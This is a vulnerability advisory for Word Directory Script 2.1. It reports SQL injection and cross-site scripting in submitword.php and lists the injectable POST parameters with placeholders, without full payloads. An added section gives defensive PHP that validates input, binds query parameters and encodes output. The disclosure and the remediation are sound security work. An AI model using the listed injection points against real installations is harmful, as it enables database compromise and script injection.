Word Directory Script 2.1 Cross Site Scripting / SQL Injection

Published: 2017.04.15
Credit: Bilal KARDADOU
Risk: Medium
CWE: CWE-89, CWE-79
CVE: N/A
Local: No
Remote: Yes

################################################
#Title: Word Directory Script v 2.1 - Cross Site Scripting / SQL Injection
#Credit: Bilal KARDADOU
#Vendor: http://www.phponly.com/
#Vendor URL: http://www.phponly.com/words.html
#Product: Word Directory Script v 2.1
#Google Dork: N/A
################################################
#
# Product & Service Introduction:
#
# "Word Directory Script"
# The big difference between this directory and the others,
# is that this one has a user statistic where users can login and see how many hits their words have received.
# This word directory offers you better features than any other.
# Listings cannot be submitted until payment has been received.
#
# [POST Method] http://localhost/words/submitword.php
# Data: name=[SQL]Tebi&client_mail=demo%40demo.com[SQL]&url=http%3A%2F%2Fwww.google.com[SQL]&word=tebi&size=15[SQL]&is_bold=1&color=%230000FF&title=aaaaaa[SQL]&terms_accepted=1&buyword=
#
# PoC:
# http://prntscr.com/evwcwr
# http://prntscr.com/evwejp
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/
################################################
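
Added example (not part of the original advisory and not the vendor's code): one way a handler for the submitword.php fields listed above could validate input, bind every value as a query parameter, and encode on output. The "words" table, its column names, the PDO connection and the length and size limits are assumptions.

```php
<?php
// Added example. The "words" table, its columns, and the size/length limits
// are assumptions; the field names come from the advisory's POST data.

function validate_submission(array $in): array
{
    $str = fn(string $k): string => is_string($in[$k] ?? null) ? trim($in[$k]) : '';
    $out = ['name' => $str('name'), 'word' => $str('word'), 'title' => $str('title')];
    $errors = [];
    foreach ($out as $field => $value) {
        if ($value === '' || strlen($value) > 100) {
            $errors[] = $field;
        }
    }
    $out['client_mail'] = filter_var($str('client_mail'), FILTER_VALIDATE_EMAIL);
    $out['url'] = filter_var($str('url'), FILTER_VALIDATE_URL);
    if ($out['url'] !== false && !preg_match('#^https?://#i', $out['url'])) {
        $out['url'] = false; // accept only http and https links
    }
    $out['size'] = filter_var($str('size'), FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 8, 'max_range' => 40]]);
    $out['color'] = preg_match('/^#[0-9A-Fa-f]{6}$/', $str('color')) ? $str('color') : false;
    foreach (['client_mail', 'url', 'size', 'color'] as $field) {
        if ($out[$field] === false) {
            $errors[] = $field;
        }
    }
    $out['is_bold'] = $str('is_bold') === '1' ? 1 : 0;
    return [$out, $errors];
}

function save_word(PDO $db, array $w): void
{
    // Placeholders keep every value out of the SQL text (CWE-89).
    $stmt = $db->prepare(
        'INSERT INTO words (name, client_mail, url, word, size, is_bold, color, title)
         VALUES (:name, :client_mail, :url, :word, :size, :is_bold, :color, :title)'
    );
    $stmt->execute($w);
}

function h(string $s): string
{
    // Encode on output so stored values cannot become markup (CWE-79).
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
```

Call validate_submission($_POST), reject the request when the error list is non-empty, and pass the cleaned array to save_word(); wrap every stored value in h() wherever it is echoed into a page.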




Copyright 2017, cxsecurity.com